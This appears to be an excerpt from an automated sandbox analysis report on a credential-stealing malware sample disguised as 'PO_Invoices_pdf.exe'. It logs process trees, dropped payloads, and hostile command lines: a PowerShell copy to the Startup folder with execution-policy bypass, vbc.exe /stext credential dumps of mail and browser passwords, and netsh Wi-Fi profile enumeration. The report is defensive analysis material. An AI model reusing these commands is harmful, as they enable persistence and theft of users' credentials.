                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, hawkgoods.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, hawkgoods.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, hawkgoods.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, hawkgoods.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                            Source: PO_Invoices_pdf.exeBinary or memory string: INSERT INTO [dbo].[UsersTable] ([Id], [userName], [passWord], [locked]) VALUES (@Id, @userName, @passWord, @locked); SELECT Id, us
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, hawkgoods.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.370812465.0000000008DB1000.00000004.00000001.sdmpBinary or memory string: UPDATE [dbo].[UsersTable] SET [Id] = @Id, [userName] = @userName, [passWord] = @passWord, [locked] = @locked WHERE (([Id] = @Original_Id) AND ([userName] = @Original_userName) AND ([passWord] = @Original_passWord) AND ([locked] = @Original_locked));
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, hawkgoods.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                            Source: PO_Invoices_pdf.exeReversingLabs: Detection: 17%
                            Source: unknownProcess created: C:\Users\user\Desktop\PO_Invoices_pdf.exe 'C:\Users\user\Desktop\PO_Invoices_pdf.exe'
                            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PO_Invoices_pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\hawkgoods.exe 'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\origigoods40.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods40.exe' 0
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe 'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\origigoods20.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods20.exe' 0
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2164
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                            Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 1996
                            Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\hawkgoods.exe 'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\origigoods40.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods40.exe' 0
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe 'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\origigoods20.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods20.exe' 0
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2092
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                            Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 940
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PO_Invoices_pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\hawkgoods.exe 'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\origigoods40.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods40.exe' 0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe 'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\origigoods20.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods20.exe' 0
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2164
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\hawkgoods.exe 'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\origigoods40.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods40.exe' 0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe 'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\origigoods20.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods20.exe' 0
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2092
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess created: unknown unknown
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                            Source: PO_Invoices_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: PO_Invoices_pdf.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: PO_Invoices_pdf.exeStatic file information: File size 1655808 > 1048576
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                            Source: PO_Invoices_pdf.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x18fe00
                            Source: PO_Invoices_pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                            Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: mscorlib.pdbHs source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
                            Source: Binary string: mscorlib.pdbTD~1\AppData\Local\Temp\hawkgoods.exeAAGZ source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: mscorlib.pdb source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbm source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
                            Source: Binary string: RunPE.pdb source: PO_Invoices_pdf.exe, 00000000.00000002.277173827.00000000030A1000.00000004.00000001.sdmp
                            Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe
                            Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
                            Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe
                            Source: Binary string: C:\Windows\mscorlib.pdbl source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: C:\Windows\dll\mscorlib.pdb source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe
                            Source: Binary string: symbols\dll\mscorlib.pdb7w source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
                            Source: Binary string: oC:\Windows\mscorlib.pdb source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdb source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp
                            Source: Binary string: mscorrc.pdb source: hawkgoods.exe, 00000006.00000002.391117104.0000000004E20000.00000002.00000001.sdmp
                            Source: Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdbh} source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp

                            Data Obfuscation:

                            barindex
                            .NET source code contains potential unpackerShow sources
                            Source: hawkgoods.exe.5.dr, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: hawkgoods.exe.5.dr, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: hawkgoods.exe.5.dr, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: hawkgoods.exe.5.dr, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_00360712 push eax; ret
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_00360712 push eax; ret
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_0033BA9D push eax; ret
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_0033BA9D push eax; ret
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_00C77EF4 push eax; ret
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_00C77B84 push ebx; retf
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_00C77B81 push ebx; retf
                            Source: initial sampleStatic PE information: section name: .text entropy: 7.94835272626
                            Source: initial sampleStatic PE information: section name: .text entropy: 7.94835272626
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\origigoods40.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\hawkgoods.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\origigoods20.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeJump to dropped file

                            Boot Survival:

                            barindex
                            Drops PE files to the startup folderShow sources
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe\:Zone.Identifier:$DATAJump to behavior

                            Hooking and other Techniques for Hiding and Protection:

                            barindex
